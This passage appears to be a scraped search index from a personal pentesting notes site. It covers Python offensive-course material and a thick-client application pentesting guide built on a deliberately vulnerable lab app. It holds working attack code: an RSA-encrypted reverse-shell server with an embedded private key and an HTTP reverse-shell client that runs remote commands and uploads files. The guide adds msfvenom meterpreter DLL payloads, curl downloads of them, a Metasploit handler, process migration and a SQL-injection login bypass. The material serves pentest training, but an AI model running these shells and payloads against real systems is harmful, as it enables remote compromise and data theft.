Rlj\nfwooOP6+YpsYzwKCAQEA6XE8ZXb+sgdvaLnBr8thAUgsHhSlZcMU+idmXPPTgu7/\nfoX6c7czIS73RrrCm9GCIQpv6k6BP/Exi9XMlEhmzQqcFFaKaPJMHRxMlHcgzJIL\nAE/g5yKUJN0GAMROLv4FFT52pkdlm/HV0rQ+2FEUX/MYla5JggTrOHJoiWNNKUzQ\n8uH2mQc+dEgzNvd+WhwNkJq5bRZqi2q+wvlj9NlucnEtD7Xcd9IoSNtHS0CfI83F\ntWCIv5uQfK2cT1A2jcLlZtT7HHWKRpd7w6+jx5t4yhPVGhCb9UIe/nM2Ex2ZTbdE\nqv7Bs2WF3lm5P/wvcrYbMcnVWo6Qrab0iRpthRz/zwKCAQEAl5IZuovvQ3hDzVaC\nYgPTjOtqmOjtii84n4tQK4lZojNs6SUsr7lXY5V43mH2SMOAwTMxDgCBJ8u8zWf0\naWAJjpnif5OreI6T3zwoRv85uX/k+6NqLp1NM0h8yo//wt8GPm1ng9sbwNG52zAM\nEu0pz2ky3dqa23OxETTdduDVD6PMvxMG0ibxK
gvRaxzIk9WuurSliNGoKBG5o/zn\neGpSyoyhr3O4ycVDawfihg3xFin2xUf7W9WuNDFmri9YjSFY6cgkrYCTRBZG8E2Z\nDcR/LbI9nR4UGHhetfHjj5xZZcjy1oQM4+QcT2xH4PTFD0qLzDUM3fU87v4Y6uv4\n711AIQKCAQEAjp9ILxWMdmhkgK88zpKLKaVWjuo+QvX1EwCPYar2RsCOCFcCtT/w\nVQ3EtcnUrC5MOrONvLFJ9i79/lkZLF8vr4YT5bkZxxSBvCdWAj7mIxX28rHazlwp\n9nuy9zT4L22y3U/UXbKxOZ1+7cSBwNeIgzaahph9AJrQuyPrCkVJFzp/TmUPrF7o\noVKbN7Ht2E/bWcWuFB/l6FfHRIfpseZFvFW5GigaEnqrchfGbwuELvPBHxdjdO0u\nUX4gSbTQH7w7O6BT6wdE++wBCYV9oq4yFgQX5lzPbACBvyPUnckvqHOX2IDdByW3\nrClVLOp+cq8f3kNZvoHrkqy2Ki2jS/hzsQKCAQB+A7OrM+7hns9bRKxm/SGChTx3\n73c2IrGepgN/ra5eXNi/aywvpy+yOrorDcJ3gfTMg4yeVnqA/FcOMWQkpbHbtXAm\nHDT/tc4t88SR2Z/gzt1ZAIT+dB2N5T0qV91ZTUm5XxIRfHiT/D3rokDzYbnQQKwl\nyExyM9RINW9wIO19KNxDpS0TbcB0bkpYgn5f+bAvJ7Pe6Xof88DUrhoy3PnYHNYY\naH+BJDcZLlE/MpIXXgy+2afo7MkNBTS6jLPihnC447QhWZ2ufp2/dHnwy2XMJcsE\n76tuOr1FELvtzE3z2BE9OvCJj4Mb3grRMD35Q1Aqd4TAgSF2Okl2EsmR/wf9\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    dec = decryptor.decrypt(cipher)\n    return dec.decode()\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n    conn, addr = s.accept()\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result))\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tunning-the-connection-attemps/","title":"Tunning the connection attempts","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tuning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bare attacker public IP.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hijack the Internet Explorer process to bypass a host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and cryptography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hijacking:
                • Simple keylogger in python.
                • Hijacking KeePass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/tunning-the-connection-attemps/#client-side","title":"Client side","text":"

              We wrap our previous HTTP shell in a function called connect.

              import requests\nimport os\nimport subprocess\nimport time\n\nimport random # Needed to generate random \n\n\ndef connect(): # we put our previous http shell in a function called connect\n\n    while True:\n\n        req = requests.get('http://127.0.0.1:8080')\n        command = req.text\n\n        if 'terminate' in command:\n            return 1 # if we got terminate order, then we exit connect function and return a value of 1, this value will be used to end up the whole script\n\n\n        elif 'grab' in command:\n            grab, path = command.split(\"*\")\n            if os.path.exists(path):\n                url = \"http://127.0.0.1:8080/store\"\n                files = {'file': open(path, 'rb')}\n                r = requests.post(url, files=files)\n            else:\n                post_response = requests.post(url='http://127.0.0.1:8080', data='[-] Not able to find the file!'.encode())\n        else:\n            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stdout.read())\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stderr.read())\n    time.sleep(3)\n\n\n# Here we start our infinite loop, we try to connect to our kali server, if we got an exception (connection error)\n# then we will sleep for a random time between 1 and 10 seconds and we will pass that exception and go back to the \n# infinite loop once again untill we got a sucessful connection. \n\n\nwhile True:\n    try:\n        if connect() == 1:\n            break\n    except:\n        sleep_for = random.randrange(1, 10)#Sleep for a random time between 1-10 seconds\n        time.sleep(int(sleep_for))\n        #time.sleep( sleep_for * 60 )      #Sleep for a random time between 1-10 minutes\n        pass\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"thick-applications/","title":"Introduction to Pentesting Thick Clients Applications","text":"

              Checklist for Pentesting Thick client applications

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.

              Thick client applications are applications that run standalone on the desktop. Thick clients have two attack surfaces:

              • Static.
              • Dynamic.

              They are quite different from web applications in that most tasks are performed on the client side, so these apps depend heavily on the client's system resources, such as CPU and RAM.

              They are usually written in these languages:

              • .NET
              • C/C++
              • Java applets, etc.
              • Native Android / iOS mobile applications: Objective-C, Swift.
              • and more.

              They are considered legacy, but they can still be found in some organizations.

              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#basic-architecture","title":"Basic Architecture","text":"
              • 1-Tier Architecture: a standalone application.
              • 2-Tier Architecture: EXE / web-based launcher / Java-based app + database. Business logic lives in the application, which communicates directly with the database server. Things to consider when pentesting: login and registration features, the DB connection, strings, TLS/SSL, registry keys.
              • 3-Tier Architecture: EXE + server + database. Business logic can be moved to the server, so security findings are less common. These apps have no proxy settings of their own, so to send their traffic to a proxy server some changes need to be made in the system hosts file (see the example below).
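
              For instance (hypothetical server name; a sketch of the hosts-file trick): if the app is hardcoded to reach appserver.example.com, this entry in C:\Windows\System32\drivers\etc\hosts points it at a local proxy listener instead:

              127.0.0.1    appserver.example.com\n

              The proxy (e.g. Burp) then listens on 127.0.0.1 on the service port and forwards the traffic to the real server.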
              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#some-decompilation-tools","title":"Some decompilation tools","text":"
              • C++ decompilation: https://ghidra-sre.org
              • C# decompilation: dnspy.
              • JetBrains dotPeek.
              ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/","title":"Attacking thick clients applications: Data storage issues","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-hard-coded-credentials","title":"1. Hard Coded credentials","text":"

              Developers often hardcode sensitive details in thick clients.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#strings","title":"strings","text":"

              Strings comes with sysInternalsSuite. It's similar to the \"strings\" command in bash: it displays all the human-readable strings in a binary:

              strings.exe C:\\Users\\admin\\Desktop\\tools\\original\\DVTA.exe > C:\\Users\\admin\\Desktop\\strings.txt\n

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#dnspy","title":"dnspy","text":"

              We know the FTP connection is made in the Admin screen, so we open the application with dnspy and locate the button in the Admin screen that triggers the FTP connection. Credentials for the connection can be found there:

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-storing-sensitive-data-in-registry-entries","title":"2. Storing sensitive data in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#regshot","title":"regshot","text":"

              1. Run the regshot version that matches your thick app (x86 or x64).

              2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

              3. Open the app you want to test and login into it.

              4. Perform some action, for instance viewing the profile.

              5. Take a \"Second shot\" of the Registry entries.

              6. After that, you will see the button \"Compare\" enabled. Click on it.

              An HTML file will be generated and you will see the registry entries:

              An interesting registry entry is \"isLoggedIn\", which has changed from false to true. This may be a potential attack vector (we could set it to true and also change the username to admin), as sketched below.

              HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-database-connection-strings-in-memory","title":"3. Database connection strings in memory","text":"

              When connecting to a database, the connection string may be:

              • in clear text
              • or encrypted.

              Even if encrypted, it's still possible to find it in memory. If we can dump the memory of the process, we should be able to find the clear-text connection string in it.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#process-hacker-tool","title":"Process Hacker tool","text":"

              Download from: https://processhacker.sourceforge.io/downloads.php

              We will be using the portable version.

              1. Open the application you want to test.

              2. Open Process Hacker Tool.

              3. Select the application, right-click it and choose \"Properties\".

              4. Select tab \"Memory\".

              5. Click on \"Strings\".

              6. Check \"Image\" and \"Mapped\" and search!

              7. In the results you can use the Filter option to search for (in this case) \"data source\".

              Other possible searches: \"decrypt\". A clear-text connection string in memory reveals credentials: pwned!!!
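
              If you prefer to script this step, here is a minimal sketch; it assumes you have already saved a dump of the process (e.g. a dvta.dmp created via Task Manager's \"Create dump file\") and greps it for the same marker as the GUI filter:

              with open(\"dvta.dmp\", \"rb\") as f:\n    data = f.read()\n\n# Look for the same marker the Process Hacker filter would use\nidx = data.find(b\"Data Source\")\nif idx != -1:\n    # The rest of the connection string lives right after the hit\n    print(data[idx:idx + 200])\n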

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-sql-injection","title":"4. SQL injection","text":"

              If input is not sanitized, when logging into an app we can subvert the logic of the query sent to the database:

              select * from users where username='x' and password='x';\n

              In the DVTA app, we could try to do this:

              select * from users where username='x' or 'x'='x' and password='' or 'x'='x';\n

              For that we only need to enter this into the login page:

              x' or 'x'='x\n

              And now we are ... raymond!!!
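
              Why this works, as a hypothetical sketch of the vulnerable pattern (not DVTA's actual source): the application concatenates user input straight into the SQL string, so the quote in the payload breaks out of the literal and the trailing or 'x'='x' makes the WHERE clause true for every row:

              username = \"x' or 'x'='x\"  # the payload typed into the login field\npassword = \"x' or 'x'='x\"\n\n# Vulnerable pattern: string concatenation instead of a parameterized query\nquery = (\"select * from users where username='\" + username +\n         \"' and password='\" + password + \"';\")\nprint(query)\n# select * from users where username='x' or 'x'='x' and password='x' or 'x'='x';\n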

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#5-side-channel-data-leaks","title":"5. Side channel data leaks","text":"

              Application logs are an example of side-channel data leaks. Developers often use logs for debugging purposes during development.

              Where can you find those logs? For example, in console output. Open the command prompt and run the vulnerable thick application like this:

              dvta.exe > C:/Users/admin/Desktop/dvta_logs.txt\n

              After that, open the DVTA application, log in as admin and perform some actions. When done, close the application.

              If you want to add some more logs with a different user, open the app from the console again and append the new output to the file:

              dvta.exe >> C:/Users/admin/Desktop/dvta_logs.txt\n

              Now, log into the app as a regular user and browse around.

              Open the file with the application logs and, if you are lucky and debug mode is still on, you will be able to see things such as SQL queries, decrypted database passwords, users, the temp location of the FTP file...
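
              A small helper to triage such a log dump (a sketch; the keyword list is an assumption, extend it for the app under test):

              keywords = (\"password\", \"select\", \"insert\", \"ftp\", \"decrypt\")\n\nwith open(r\"C:\\Users\\admin\\Desktop\\dvta_logs.txt\", errors=\"ignore\") as log:\n    for line in log:\n        if any(k in line.lower() for k in keywords):\n            print(line.rstrip())\n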

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#6-unreliable-data","title":"6. Unreliable data","text":"

              Some applications log data (for instance, timestamps) for later use. If the user is able to tamper with this data, the application ends up trusting attacker-controlled values.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#7-dll-hijacking","title":"7. DLL Hijacking","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#what-is-dll-hijacking","title":"What is DLL Hijacking","text":"

              A Dynamic Link Library (DLL) file usually holds executable code that can be used by other applications, meaning it can act as a library. This makes DLL files very attractive to attackers: if they manage to deceive the application into loading a different DLL (with the same name), the result can be the compromise of the host.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-is-dll-hijacking-perform","title":"How is DLL Hijacking perform?","text":"

              When an application loads a DLL without providing an absolute path, there are several techniques to deceive it, as illustrated below.
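
              As a minimal illustration (a sketch, not DVTA code; assumes a Windows host), Python's ctypes goes through the same LoadLibrary search order when it is given only a bare DLL name:

              import ctypes  # Windows-only\n\n# Bare name: Windows walks the DLL search order, starting with the\n# application's own directory - which is why a planted same-name DLL wins\ndwrite = ctypes.WinDLL(\"DWrite.dll\")\n\n# Absolute path: the search order is bypassed entirely\ndwrite_safe = ctypes.WinDLL(r\"C:\\Windows\\System32\\DWrite.dll\")\n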

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#placing-our-dll-in-the-directory-in-which-the-app-will-look","title":"Placing our DLL in the directory in which the app will look","text":"

              This is the expected DLL search order:

              • The directory from which the application is loaded.
              • The current directory.
              • The system directory
                (C:\\\\Windows\\\\System\\\\)\n
              • The 16-bit system directory.
              • The Windows directory.
              • The directories that are listed in the PATH environment variable.
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-locate-interesting-dll-files-with-processmonitor-or-procmon","title":"1. Locate interesting DLL files with ProcessMonitor (or ProcMon)","text":"

              We can try to find DLL files that the app requests but does not find. For that we can use ProcessMonitor with filters like:

              • Process Name is DVTA.exe
              • Result is NAME NOT FOUND
              • Path ends with dll.

              If you log into the app, you will find some DLL files that can be used to attempt exploitation:

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-crafting-our-malicious-dll-and-serving-them-to-the-machine","title":"2. Crafting our malicious DLL and serving them to the machine","text":"

              We will assume we are trying to deceive the app with these two files:

              • SECUR32.dll
              • DWrite.dll

              We will open a Kali machine, craft two DLL payloads using msfvenom, copy them into the Apache web root, and start Apache to serve those two files. Commands:

              msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=4444 -a x86 -f dll > SECUR32.dll\n# -p: the chosen payload\n# -a: architecture of the victim machine/application\n# -f: format of the output file\n\n# Copying the payloads to the Apache web root\nsudo cp SECUR32.dll /var/www/html/\ncp SECUR32.dll DWrite.dll\nsudo cp DWrite.dll /var/www/html\n\n# Starting Apache\nservice apache2 start\n

              Now, in the Windows 10 VM (maybe after disabling real-time protection), we can retrieve those files with:

              curl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\SECUR32.dll\ncurl http://10.0.2.15/DWrite.dll --output C:\\Users\\admin\\Desktop\\DWrite.dll\n
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-launching-the-attack","title":"3. Launching the attack","text":"

              Place the crafted DLL file in the same folder as the application. In my case I will place DWrite.dll into

              C:\\Users\\admin\\Desktop\\tools\\original\n

              On the Kali machine, start Metasploit and set up a handler:

              msfconsole\n
              use exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.0.2.15\nset LPORT 4444\nrun\n

              Now you can start the application on the Windows machine, and on the listening handler in Kali you will get a Meterpreter session.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-moving-your-meterpreter-to-a-different-process","title":"4. Moving your meterpreter to a different process","text":"

              List all processes from the Meterpreter session and migrate to a less suspicious one. This will also unblock the DVTA app on the Windows machine:

              ps\nmigrate <ID>\n
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-to-connect-to-a-database-after-getting-the-credentials","title":"How to connect to a database after getting the credentials","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-basic-lab-setup/","title":"Basic Lab Setup - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#environment-description","title":"Environment description","text":"
              • VirtualBox or VMWare Installation workstation.
              • Windows 10 VM 1 (database) -> SQL server.
              • (optional) Windows 10 VM 2 (client) -> DVTA.

              In the course we will be using a single Windows 10 machine with both the SQL server and the DVTA application installed. Therefore there is no need for a second Windows 10 VM, since all the needed applications will be installed on this single virtual machine.

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#software-resources","title":"Software resources","text":"
              • Get windows 10 iso from: Repo for legacy Operating system.
              • Damn Vulnerable Thick Client Application DVTA (modified version given in the course): https://drive.google.com/open?id=1u46XDgVpCiN6eGAjILnhxsGL9Pl2qgcD.
              • SQL Server Express 2008: SQL Server\u00ae 2008 R2 SP2.
              • SQL Server Management Studio SQL Server Management Studio (SSMS).
              • Filezilla FTP Server: FileZilla Server for Windows (64bit x86) (filezilla-project.org).

              Now, open the Windows 10 VM and start the lab setup!

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#1-install-sql-server-express-2008","title":"1. Install SQL Server Express 2008","text":"

              In the Download page we will choose SQLEXPR_x64_ENU.exe.

              Some helpful tips and screenshots about the installation:

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#2-install-sql-server-management-studio-1901","title":"2. Install SQL Server Management Studio 19.0.1","text":"

              This installation is pretty straightforward. Download page

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#creating-database-dtva-four-our-vuln-thick-app","title":"Creating database DTVA four our vuln thick app","text":"

              We will create the database \"DVTA\" and we will populate it with some users and expenses:

              1. Open SSMS (SQL Server Management Studio), right-click on the \"Databases\" object and create a new database called DVTA.

              2. Create a new table \"users\" in the database DVTA.

              Here is the query:

              CREATE TABLE \"users\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"username\" VARCHAR(100) NOT NULL,\n    \"password\" VARCHAR(100) NOT NULL,\n    \"email\" VARCHAR(100) NULL DEFAULT NULL,\n    \"isadmin\" INT NULL DEFAULT '0',\n    PRIMARY KEY (\"id\")\n)\n

              3. Populate the database with 3 given users:

              Here is the query:

              INSERT INTO dbo.users (username, password, email, isadmin)\nVALUES\n('admin','admin123','admin@damnvulnerablethickclientapp.com',1),\n('rebecca','rebecca','rebecca@test.com',0),\n('raymond','raymond','raymond@test.com',0);\n

              4. Create the table \"expenses\" in the database DVTA.

              Here is the query:

              CREATE TABLE \"expenses\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"email\" VARCHAR(100) NOT NULL,\n    \"item\" VARCHAR(100) NOT NULL,\n    \"price\" VARCHAR(100) NOT NULL,\n    \"date\" VARCHAR(100) NOT NULL,\n    \"time\" VARCHAR(100) NULL DEFAULT NULL,\n    PRIMARY KEY (\"id\")\n)\n
              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#adittional-configurations","title":"Adittional configurations","text":"

              Some configurations need to be done so the connection works:

              1. Open SQL Server Configuration Manager and enable TCP/IP protocol connections:

              2. Also in SQL Server Configuration Manager, restart SQL Server (SQLEXPRESS)

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#3-install-filezilla-ftp-server","title":"3. Install Filezilla FTP server","text":"

              1. Download Filezilla Server, install it and initiate a connection: Download page

              As for the connection initiation, I'm using localhost 127.0.0.1, port 14148 and password \"filezilla\":

              2. Add a user. Name \"dvta\" and password \"p@ssw0rd\"

              3. Add a shared folder. Be careful with slashes and backslashes (wink!) so as not to get the typical error \"error on row number 1 virtual path must be absolute\".

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-common-vulnerabilities/","title":"Common vulnerabilities","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#application-signing","title":"Application Signing","text":"

              To check whether the application is signed, we use the sigcheck tool from the SysInternals Suite.

              From command line we run sigcheck.exe and check if DVTA.exe is signed.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#compiler-protection","title":"Compiler protection","text":"

              We will use the tool binscope, provided by Microsoft.

              Download it from: https://www.microsoft.com/en-us/download/details.aspx?id=44995

              Install it by double-clicking on it.

              Now from command line:

              .\\binscope.exe /verbose /html /logfile c:/path/to/outputreport.html C:/path/to/application/toAudit/DVTA.exe\n

              After executing the command you will obtain a report of the basic checks that binscope ran on the application.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#automated-source-code-scanning","title":"Automated source code scanning","text":"","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#visual-code-grepper","title":"Visual Code Grepper","text":"

              Download it from: https://sourceforge.net/projects/visualcodegrepp/

              To run a scan:

              1. Open the application in dotPeek and export it as a Visual Studio project. This exports the decompiled code of the application to the location we indicate.

              2. Open Visual Code Grepper. In the FILE menu, first option, specify the target directory (where we saved the decompiled files). If the error message says \"no files for the specified language\", change the language in the Settings menu (C#).

              3. Click on the Scan menu > Full scan.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-first-challenge/","title":"First challenge: enabling a button","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.

              One thing is still missing after the Basic lab setup: launching the application and making sure that it works. If we proceed, sooner rather than later we will see that one thing is left to do before starting to use the DVTA app: setting up the server in the vulnerable app (DVTA).

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#the-problem-a-button-is-not-working","title":"The problem: a button is not working","text":"

              If we launch the vulnerable app, DVTA, we will see that the button labelled \"Configure Server\" is not enabled. We will use the tool dnspy to enable that button.

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#using-dnspy-to-see-and-modify-compiled-code","title":"Using dnspy to see and modify compiled code","text":"

              1. We will use the 32-bit version of dnspy, since DVTA is a 32-bit app. Open the 32-bit version of dnspy, go to FILE > Open > [select the DVTA.exe file], and you will see it in the sidebar of dnspy:

              2. Expand DVTA, go to the decompiled object used in the login and read the code. You will see the function isserverConfigured(). The tooltip that opens also shows that this function receives a BOOLEAN value.

              3. Edit the function in IL instructions

              4. Modify the value of the boolean in the IL instruction.

              5. Save the module.

              6. Now when you open the DVTA application the button will be enabled and we will be able to set up the server. Our server is going to be the database server we just configured for our application (127.0.0.1).

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#making-sure-that-it-works","title":"Making sure that it works","text":"

              If we browse the configuration file (DVTA.exe.Config) we will see that the configuration has taken place:

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-information-gathering-phase/","title":"Information gathering phase - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#what-we-will-be-doing","title":"What we will be doing","text":"

              1. Understand the functionality of the application.

              2. Architecture diagram from the client.

              3. Network communications in the app.

              4. Files that are being accessed by the client.

              5. Interesting files within the application directory.

              Tools: CFF explorer, wireshark, and sysInternalsSuite.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#ip-addresses-that-the-app-is-communicating-with","title":"IP addresses that the app is communicating with","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#tcp-view","title":"TCP View","text":"

              To see which IP addresses the app is communicating with, we can use TCP View from sysInternalsSuite.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#wireshark","title":"Wireshark","text":"

              We can also use wireshark

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#language-in-which-the-app-is-built-in","title":"Language in which the app is built in","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#cff-explorer","title":"CFF Explorer","text":"

              To see which language the app is built in, and which tool was used, we can use CFF Explorer. Open the app with CFF Explorer.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#changes-in-the-filesystem","title":"Changes in the FileSystem","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#procesmonitor","title":"ProcesMonitor","text":"

              Use the ProcessMonitor tool from sysInternalsSuite to see changes in the file system.

              For instance, you can analyze access to interesting files in the application directory. Now we have this information:

